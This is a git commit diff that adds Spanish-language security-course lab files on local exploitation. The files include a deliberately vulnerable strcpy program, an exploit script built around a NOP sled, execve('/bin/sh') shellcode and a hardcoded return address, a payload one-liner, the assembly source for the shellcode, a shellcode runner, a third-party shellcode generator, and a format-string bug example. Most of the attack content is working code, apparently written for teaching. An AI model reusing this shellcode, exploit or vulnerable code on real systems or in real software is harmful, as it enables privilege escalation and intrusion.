diff options
| author | Guillermo Ramos | 2013-05-27 00:07:01 +0200 | 
|---|---|---|
| committer | Guillermo Ramos | 2013-05-27 00:07:01 +0200 | 
| commit | 45ec0c7e1bfd251e13f4d3ade89785e98df31ba9 (patch) | |
| tree | 1f9b534ed4ea650517c39799f5e2aed0885ce87d /c_seguridad/code | |
| download | acm-45ec0c7e1bfd251e13f4d3ade89785e98df31ba9.tar.gz | |
Diffstat (limited to 'c_seguridad/code')
| -rw-r--r-- | c_seguridad/code/bof/.chuleta.txt | 1 | ||||
| -rw-r--r-- | c_seguridad/code/bof/exit.asm | 8 | ||||
| -rwxr-xr-x | c_seguridad/code/bof/exploit.py | 23 | ||||
| -rw-r--r-- | c_seguridad/code/bof/exploitable.c | 14 | ||||
| -rw-r--r-- | c_seguridad/code/bof/shellcode | 1 | ||||
| -rwxr-xr-x | c_seguridad/code/bof/shellcodeGen/shellcodeGen.c | 73 | ||||
| -rw-r--r-- | c_seguridad/code/bof/shellex.asm | 25 | ||||
| -rw-r--r-- | c_seguridad/code/bof/test.c | 15 | ||||
| -rw-r--r-- | c_seguridad/code/formatst/ejemplodospuntoce.c | 7 | ||||
| -rw-r--r-- | c_seguridad/code/formatst/ejemplotrespuntoce.c | 7 | ||||
| -rw-r--r-- | c_seguridad/code/stack/ejemplounopuntoce.c | 10 | ||||
| -rw-r--r-- | c_seguridad/code/stack/stack.c | 9 | ||||
| -rw-r--r-- | c_seguridad/code/strcmp.c | 19 | 
13 files changed, 212 insertions, 0 deletions
| diff --git a/c_seguridad/code/bof/.chuleta.txt b/c_seguridad/code/bof/.chuleta.txt new file mode 100644 index 0000000..b5ddbf3 --- /dev/null +++ b/c_seguridad/code/bof/.chuleta.txt @@ -0,0 +1 @@ +Exploitable (repetir función): perl -e 'print "A"x72 . "\xd4\x83\x04\x08"' diff --git a/c_seguridad/code/bof/exit.asm b/c_seguridad/code/bof/exit.asm new file mode 100644 index 0000000..1ee5f18 --- /dev/null +++ b/c_seguridad/code/bof/exit.asm @@ -0,0 +1,8 @@ +SECTION .text +global _start +_start: +	xor		eax, eax +	mov		al, 1 +	xor		ebx, ebx +	mov		bl, 123 +	int		0x80 diff --git a/c_seguridad/code/bof/exploit.py b/c_seguridad/code/bof/exploit.py new file mode 100755 index 0000000..5219755 --- /dev/null +++ b/c_seguridad/code/bof/exploit.py @@ -0,0 +1,23 @@ +#!/usr/bin/env python2 +# -*- coding: utf-8 -*- + +from time import sleep +from os import system + + +shellcode = ( +    # Buffer offset +    "\x90"*17 + + +	# Shellcode (55 chars) +	"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b" +	"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" +	"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" +	"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42" + +    "\xf8\xf7\xff\xbf" +    ) + +cmd = "./exploitable " + shellcode + +print shellcode diff --git a/c_seguridad/code/bof/exploitable.c b/c_seguridad/code/bof/exploitable.c new file mode 100644 index 0000000..5492a29 --- /dev/null +++ b/c_seguridad/code/bof/exploitable.c @@ -0,0 +1,14 @@ +#include <string.h> +#include <stdio.h> + +void vulnerable(char* str) { +	printf("Entrando en vulnerable...\n"); +	char arr[60]; +	strcpy(arr, str); +} + +int main(int argc, char** argv) { +	if (argc > 1) +		vulnerable(*(argv+1)); +	return 0; +} diff --git a/c_seguridad/code/bof/shellcode b/c_seguridad/code/bof/shellcode new file mode 100644 index 0000000..e36a2c5 --- /dev/null +++ b/c_seguridad/code/bof/shellcode @@ -0,0 +1 @@ +1F11̀1[C[CKS̀/bin/shNAAAABBBB diff --git a/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c new file mode 100755 index 0000000..0221f48 --- /dev/null +++ b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c @@ -0,0 +1,73 @@ +/**
 + *
 + * BlackLight's shellcode generator for Linux x86
 + * Tested anywhere, working & NULL-free
 + *
 + * Usage: ./generator <cmd>
 + * ...and then you've got a ready2inject NULL-free shellcode for the command you like
 + *
 + * copyleft 2008 by BlackLight <blacklight[at]autistici.org>
 + * < http://blacklight.gotdns.org >
 + *
 + * Released under GPL v.3 licence
 + *
 + * Greetz to: evilsocket, for the idea he gave me  ;) 
 + * Greetz to: my friends, who tested, used and appreciated this code and helped
 + *      me to improve it to what it is now
 + * Greetz to: my girl, next to me in any moment even if she had no idea
 + *      about what I was doing ^^
 + */
 +
 +#include <stdio.h>
 +#include <stdlib.h>
 +#include <string.h>
 +
 +char code[] =
 +      "\\x60"                        /*pusha*/
 +      "\\x31\\xc0"                   /*xor    %eax,%eax*/
 +      "\\x31\\xd2"                   /*xor    %edx,%edx*/
 +      "\\xb0\\x0b"                   /*mov    $0xb,%al*/
 +      "\\x52"                        /*push   %edx*/
 +      "\\x68\\x6e\\x2f\\x73\\x68"    /*push   $0x68732f6e*/
 +      "\\x68\\x2f\\x2f\\x62\\x69"    /*push   $0x69622f2f*/
 +      "\\x89\\xe3"                   /*mov    %esp,%ebx*/
 +      "\\x52"                        /*push   %edx*/
 +      "\\x68\\x2d\\x63\\x63\\x63"    /*push   $0x6363632d*/
 +      "\\x89\\xe1"                   /*mov    %esp,%ecx*/
 +      "\\x52"                        /*push   %edx*/
 +      "\\xeb\\x07"                   /*jmp   804839a <cmd>*/
 +      "\\x51"                        /*push   %ecx*/
 +      "\\x53"                        /*push   %ebx*/
 +      "\\x89\\xe1"                   /*mov    %esp,%ecx*/
 +      "\\xcd\\x80"                   /*int    $0x80*/
 +      "\\x61"                        /*popa*/
 +      "\\xe8\\xf4\\xff\\xff\\xff"    /*call  8048393 <l1>*/;
 +
 +int main (int argc, char **argv)  {
 +      int i,len=0;
 +      char *shell,*cmd;
 +
 +      if (!argv[1])
 +              exit(1);
 +
 +      for (i=1; i<argc; i++)
 +              len += strlen(argv[i]);
 +      len += argc;
 +
 +      cmd = (char*) malloc(len);
 +
 +      for (i=1; i<argc; i++)  {
 +              strcat (cmd,argv[i]);
 +              strcat (cmd,"\x20");
 +      }
 +
 +      cmd[strlen(cmd)-1]=0;
 +      shell = (char*) malloc( sizeof(code) + (strlen(argv[1]))*5 + 1 );
 +      memcpy (shell,code,sizeof(code));
 +
 +      for (i=0; i<strlen(cmd); i++)
 +              sprintf (shell,"%s\\x%.2x",shell,cmd[i]);
 +      printf ("%s\n",shell);
 +}
 +
 +// milw0rm.com [2008-08-19]
\ No newline at end of file diff --git a/c_seguridad/code/bof/shellex.asm b/c_seguridad/code/bof/shellex.asm new file mode 100644 index 0000000..00968ea --- /dev/null +++ b/c_seguridad/code/bof/shellex.asm @@ -0,0 +1,25 @@ +SECTION .text +global _start +_start: +	xor		eax, eax +	mov		al, 70 +	xor		ebx, ebx +	xor		ecx, ecx +	int		0x80 + +	jmp short ender + +starter: +	xor		eax, eax +	pop		ebx +	mov		[ebx+7], al +	mov		[ebx+8], ebx +	mov		[ebx+12], eax +	mov		al, 11 +	lea		ecx, [ebx+8] +	lea		edx, [ebx+12] +	int		0x80 + +ender: +	call starter +	db "/bin/shNAAAABBBB" diff --git a/c_seguridad/code/bof/test.c b/c_seguridad/code/bof/test.c new file mode 100644 index 0000000..c88c260 --- /dev/null +++ b/c_seguridad/code/bof/test.c @@ -0,0 +1,15 @@ +char shellcode[] = +"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b" +"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d" +"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73" +"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"; + +//char shellcode[] = +//"\x31\xc0\xb0\x01\x31\xdb\xb3\x7b\xcd\x80"; + + +int main() { +	int (*func)(); +	func = (int (*)()) shellcode; +	(*func)(); +} diff --git a/c_seguridad/code/formatst/ejemplodospuntoce.c b/c_seguridad/code/formatst/ejemplodospuntoce.c new file mode 100644 index 0000000..6f7f181 --- /dev/null +++ b/c_seguridad/code/formatst/ejemplodospuntoce.c @@ -0,0 +1,7 @@ +#include <stdio.h> + +int main(int argc, char** argv) { +	if (argc > 1) +		printf(argv[1]); +	return 0; +} diff --git a/c_seguridad/code/formatst/ejemplotrespuntoce.c b/c_seguridad/code/formatst/ejemplotrespuntoce.c new file mode 100644 index 0000000..8e49d87 --- /dev/null +++ b/c_seguridad/code/formatst/ejemplotrespuntoce.c @@ -0,0 +1,7 @@ +#include <stdio.h> + +int main(int argc, char** argv) { +	if (argc > 1) +		printf("%s", argv[1]); +	return 0; +} diff --git a/c_seguridad/code/stack/ejemplounopuntoce.c b/c_seguridad/code/stack/ejemplounopuntoce.c new file mode 100644 index 0000000..4d2425e --- /dev/null +++ b/c_seguridad/code/stack/ejemplounopuntoce.c @@ -0,0 +1,10 @@ +#include <stdlib.h> + +char global; +float pi = 3.14; + +int main() { +	int local; +	char* buffer = (char*)malloc(20); +	return 0; +} diff --git a/c_seguridad/code/stack/stack.c b/c_seguridad/code/stack/stack.c new file mode 100644 index 0000000..2987356 --- /dev/null +++ b/c_seguridad/code/stack/stack.c @@ -0,0 +1,9 @@ +#include <stdlib.h> + +int global = 0x11111111; + +int main() { +	int local = 0x22222222; +	char buffer[] = "AAAABBBBCCCCDDD"; +	return 0; +} diff --git a/c_seguridad/code/strcmp.c b/c_seguridad/code/strcmp.c new file mode 100644 index 0000000..23ab60a --- /dev/null +++ b/c_seguridad/code/strcmp.c @@ -0,0 +1,19 @@ +#include <stdio.h> +#include <string.h> + +int main() { +	char str1[] = "aaaa"; +	char str2[] = "aaaa"; + +	if (strcmp(str1, str2) == 0) +		printf("strcmp: Son iguales\n"); +	else +		printf("strcmp: No son iguales\n"); + +	if (str1 == str2) +		printf("==: Son iguales\n"); +	else +		printf("==: No son iguales\n"); + +	return 0; +} | 
